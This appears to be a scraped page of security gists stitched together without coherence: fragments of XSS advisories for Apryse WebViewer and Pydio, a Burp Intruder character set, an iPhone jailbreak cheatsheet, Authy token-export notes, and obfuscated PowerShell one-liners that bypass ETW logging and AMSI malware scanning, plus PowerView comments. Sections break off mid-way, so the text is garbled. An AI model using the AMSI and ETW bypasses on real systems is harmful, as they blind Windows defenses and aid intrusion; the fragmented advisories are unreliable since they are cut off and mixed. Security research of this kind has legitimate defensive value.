Shariq Malik shariqmalik

CVE-2024-57240: Cross-Site Scripting (XSS) Vulnerability in Apryse WebViewer ≤ 11.1

Date Published: Feb 24 2025

Summary

A Cross-Site Scripting (XSS) vulnerability has been identified in Apryse WebViewer versions up to and including 11.1. This vulnerability allows remote attackers to execute arbitrary JavaScript code by supplying a crafted PDF file. The issue arises due to improper sanitization of user-supplied input during PDF rendering.

Affected Product

Mod of https://gist.github.com/alexlauerman/8569945

Includes space charcter also, works for Intruder -> Bruteforcer

0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~

0
1

Pydio Core <= 8.2.5 Stored XSS PoC

Advisory Information

Author: Muhammad Zeeshan (Xib3rR4dAr)
CVE: CVE-2024-40124
Title: Pydio Core <= 8.2.5 Stored XSS
Date published: June 25, 2024
Impact: Execution of malicious JavaScript leading to account takeover and phishing attacks.

Palera1n & SSL Pinning / Reverse Cheatsheet

Jailbreak

Download latest release of palera1n.
Connect iphone to computer.
Jailbreak using palera1n --setup-fakefs --fakefs. This will setup fakefs to access to sudo later.
Once phone is running, run palera1n -f to load fakefs. Do it everytime you restart the phone to rejailbreak it, no need to do previous step if the phone wasn't reset.

Terminal

Connecting to SSH

Ensure openssh package is installed on Sileo
You can then connect to ssh mobile@IP

Exporting your 2FA tokens from Authy to transfer them into another 2FA application

IMPORTANT - Update regarding deprecation of Authy desktop apps

Past August 2024, Authy stopped supported the desktop version of their apps:
See Authy is shutting down its desktop app | The 2FA app Authy will only be available on Android and iOS starting in August for details.

And indeed, after a while, Authy changed something in their backend which now prevents the old desktop app from logging in. If you are already logged in, then you are in luck, and you can follow the instructions below to export your tokens.

If you are not logged in anymore, but can find a backup of the necessary files, then restore those files, and re-install Authy 2.2.3 following the instructions below, and it should work as expected.

	# Logging bypass:

	(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'ment.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD"(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Object System.Diagnostics.Eventing.EventProvider(New-Guid)))

	# AMSI Bypass (old, burned)

	sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

	# New AMSI bypass obfuscation:

	# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
	# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c

	# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
	# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

	# New function naming schema:
	# Verbs:
	# Get : retrieve full raw data sets
	# Find : ‘find’ specific data entries in a data set